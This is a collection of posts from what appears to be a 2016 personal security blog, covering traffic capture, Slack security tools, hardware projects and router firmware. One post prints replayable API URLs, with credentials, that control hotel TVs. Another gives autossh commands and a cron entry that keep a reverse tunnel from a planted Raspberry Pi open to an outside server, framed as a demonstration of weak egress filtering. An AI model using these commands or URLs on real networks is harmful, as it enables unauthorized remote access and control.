A Docker Container To Capture All Traffic From Host.

Yesterday I was in a situation where  I was helping someone who needed to monitor and record all the traffic from a couple of servers for a day to investigate a strange issue that was happening.

Normally for this I would just tell them to run this command to record a day’s worth of traffic into 15 minute chunks.:
tcpdump -G 900 -w '%Y-%m-%d_%H:%M:%S.pcap' -W 96


…but this is 2016 and we have containers!20-ft-container(Not An Actual Docker Container.)


So I did what any self-respecting security professional would do and spent a Friday night writing a tcpdump container and put it on Docker Hub.

So now in the future when anyone wants to record all the traffic from a server all they have to do is run
docker run -v ~/pcap:/pcap --net=host -d jgamblin/tcpdump
and the pcaps will save in their home directory.
Screen Shot 2016-05-28 at 11.23.15 AM
If you want to build your own copy here is everything I have in the dockerfile:
FROM debian
RUN apt-get update && apt-get install -y \
tcpdump
RUN mkdir /pcap
RUN cd /pcap
WORKDIR /pcap
CMD tcpdump -G 900 -w '%Y-%m-%d_%H:%M:%S.pcap' -W 96
From here if you wanted to display the PCAPs in a browser for easy access all you need to do is run
docker run -h tccdumpweb -p 1337:80 -v ~/pcap:/var/www/html/ -d eboraas/apache
and all  files captured will be displayed at http://hostip:1337.
Screen Shot 2016-05-28 at 11.50.16 AM
Happy tcpdumping!

Slack Commands For Security Professionals

At work we  are moving to slack as a communication method and since I am spending so much time in the tool I decided it was time to start building in some of the tools I use on a regular basis.  So far I have put together the following tools:

/NMAP

Nmap-For-Slack runs a basic scan (nmap –top-ports 50 –open) against a host and returns the results.  I have to do such a basic scan because the timeout is 3000ms so it limits what I can do.
Screen Shot 2016-05-15 at 3.31.44 PM

/DNSRECON

DNSRecon-for-slack allows your to run a basic DNSRecon scan from inside of  Slack.
Screen Shot 2016-05-15 at 3.43.28 PM

/IPINFO

ipinfo-for-slack looks up and displays information from ipinfo.io.
Screen Shot 2016-05-15 at 3.36.01 PM

/HOSTLOOKUP

Hostlookup-for-slack grabs all the A records for a domain and displays them.
Screen Shot 2016-05-15 at 3.42.15 PM

Technical Configuration:

 

download

 
This configuration needs the following: 
Slack team.
Publically Accessible Web Server Running:
Apache
PHP
Valid DNS Record and TLS Cert
I really like a $5 DigitalOcean droplet for this.
A list of APIs you want to query or installed local security tools (nmap, dnsrecon) you want to run. 

To Do List:

Figure out how to display json blobs as flat text in html.
Figure out how to bypass 3000 ms timeout to run more complex commands.
Build a bunch more of these tools (nessus, shodan, censys.io are on the list).
If you want to help me on any of these please reach out to me on twitter at @jgamblin or via email.

Hijacking a Sonifi Hotel TV

The TV in my hotel room this week advertised how easy it is to control it with the stayconnect app.  So I downloaded it and was pretty impressed by how well it worked…. until I remembered my phone was still on 4G and VPNed through a server in Europe.
2016-05-08 16.35.47
So I fired up Burp Suite to see exactly what was going on.  To my surprise the app wasn’t posting the data like it should it was passing it as part of the URL string:
https://rci.lodgenet.com/mobile.php?method=tvOff&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a 
Here is a terrible proof of concept video I shot in my room:

Here are some of the commands I found to control the tv:
TV Power Off: 
https://rci.lodgenet.com/mobile.php?method=tvOff&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a
TV Power On: 
https://rci.lodgenet.com/mobile.php?method=tvOn&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a
Mute Sound:
https://rci.lodgenet.com/mobile.php?method=tvVolume&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&volumeLevel=0
Max Sound:
https://rci.lodgenet.com/mobile.php?method=tvVolume&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&volumeLevel=30
Change Channel:
https://rci.lodgenet.com/mobile.php?method=tuneTV&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&channelID=8
https://rci.lodgenet.com/mobile.php?method=tuneTV&api=1.5&authID=3a47aebdc1ce11e0be1c005056a60027&requestID=235431&pairingKey=cf60b769266077d5090e8e5f4f36ec7a&channelID=7
While not a major vulnerability and to exploit it you would have to capture traffic from your victim’s phone it does show really poor programming practices.

Raspberry Pi OsoYoo TFT

Last week I saw this 3.5″ Touchscreen LCD and case on Amazon for $20 so I ordered it thinking it would be fairly easy to install and get to work.  I was wrong and spent the better part of a Saturday looking at this:
2016-04-30 18.49.13
After spending 5 or 6 hours digging through forums, reddit posts and reinstalling my Raspberry Pi 3 times I finally got it to work:
2016-05-01 15.04.47
Hoping that no one else has to go through this I put together instructions and posted them on GitHub.
Now I have a cool desk clock (sudo apt-get install tty-clock) that on the backend can be doing all kinds of amazing stuff (like being a persistent reverse SSH tunnel):
2016-05-01 16.22.05
 

OSX System Information Script

This morning I needed someone who I was helping to provide me some basic information about their Macbook and realized while I knew how to get that information it wasnt all in one easy to digest place so I wrote sysinfo.sh to quickly gather that information:
Screen Shot 2016-04-29 at 9.29.52 AM
Here is the code:
https://gist.github.com/jgamblin/aa9a6eda5bce6797ab8394e0c47d3676
You will need to install iStats (gem install iStats) or comment out the lines 9, 10, 12 and 13 to get the script to run properly.

Explaining the difference between a threat, a vulnerability and a risk.

During a recent round of phone interviews while expanding my team at work I was amazed at how many security professionals have a hard time clearly answering the following question:
 “What’s the difference between a threat, a vulnerability and a risk?” 
I think being able to do so is a key to being a good security professional.   I really like to use this analogy to try to help explain these three concepts clearly:

25D3A47F00000578-0-image-a-72_1424353548514“Close the open door (vulnerability) to stop the bear (threat). If it got in we could get mauled (risk).”

Understanding and applying these three terms is the first step to being able to do great risk analysis and is the only way to effect change in most organizations.  The next step is writing risk statements.

But remember doing this exercise is as much for you as it is for who you are trying to secure.  It wouldn’t make much sense to use your limited cycles to protect yourself against bears in Dallas, Texas would it?

bear-areas-map

 

Persistent Reverse-SSH Tunnel on a RaspberryPi

I have a couple of old Raspberry Pi’s 2 laying around and have been meaning to turn them into “Remote Access Terminals” to demonstrate what happens if you do not do effective egress filtering on your network. At a high level if an attacker can plug in one of these on your network and get internet access they own your network.
Here is a terrible diagram I put together using draw.io to explain:
Untitled Diagram
To set this up you will need the following:

There are plenty of guides on setting this up so I won’t spend time doing that here. Once you have that complete and are on the pi you can run the the following command:
autossh -M 65500 -o ServerAliveInterval=20 -R 2222:localhost:22 root@digitalocean

Autossh will use ports 65500 and 65501 to send echo data over and back between server and host and open an ssh session on the public server to local port 2222 that will tunnel back to the SSH port on the Pi.
Once that is done you can ssh into your public ssh server and run the following command:
ssh -p 2222 [email protected]

Congratulations you now have a host you can control from the internet on a private network (That you totally have permission to be plugged into, right?).
back-door
While this works if the pi is has any problems the tunnel will be gone so we will use a cron job to make sure that it is always up.  You can use the following crontab entry that checks if the tunnel is up every minute:
* * * * * pi /usr/bin/screen -S reverse-ssh-tunnel -d -m autossh -M 65500 -i /home/pi/.ssh/id_rsa -o "ServerAliveInterval 20" -o "ServerAliveCountMax 3" -R 2222:localhost:22 root@digitalocean
Reboot the Pi to test and you should be good to go.

NetAidKit on a GL-inet 6416

I have been playing with the GL.inet hardware lately and stumbled upon this project called NetAidKit that is built on the $25 6416 platform that offers a purpose built TOR and VPN router.
After building the images using the instructions on their github page (here is the one I built if you trust me) all you have to do is upload it and reboot and you are in business:
Screen Shot 2016-04-19 at 6.15.51 PM
The TOR feature worked flawlessly:
Screen Shot 2016-04-19 at 7.09.00 PMScreen Shot 2016-04-19 at 7.09.47 PM
The VPN still needs a lot of work as it expects certificate based authentication and every VPN I use still uses username and password authentication so I was disappointed I didn’t get to try it out.
Screen Shot 2016-04-19 at 7.03.31 PM
Over all this is an amazing project with a great idea and lots of potential.  I will be carrying a netaidkit with me from now on even if it just to use with TOR.

Turning a $25 GL-AR150 into a $100 WifiPineapple

My friend Steve Lord recently introduced me to ultra portable GL-inet routers.  I picked up the $25 GL-AR150 to hack around on.
One of the first things I noticed while reading through their blog was that the hardware was the same as the wifipineapple nano and someone had already ported the firmware to work on the AR150.
Updating the firmware is as simple as logging in and uploading this file. Once you do it is as simple as logging in and setting it up: Screen Shot 2016-04-11 at 5.20.31 PMHere is are a couple of good guides on how to configure it:
The WiFi Pineapple Mark V – Introduction and Setup
WiFi Nano Setup
I plan on using this to do some continual AP and client monitoring around my  house.
Screen Shot 2016-04-11 at 5.35.06 PM I have a few more projects on this platform that I will be posting about soon.

Shodan2Sheets

After spending last night working on a Reverse DNS Function for Google Sheets I couldnt leave well enough alone and wrote Shodan2Sheets tonight using the shodan.io api.
Screen Shot 2016-04-04 at 9.49.25 PM
It provides a lot more information than the reverse lookup function and all you should have to do is copy your API key to C2 and then start filling in IP addresses in the A column.   You can download a copy here.

Site Footer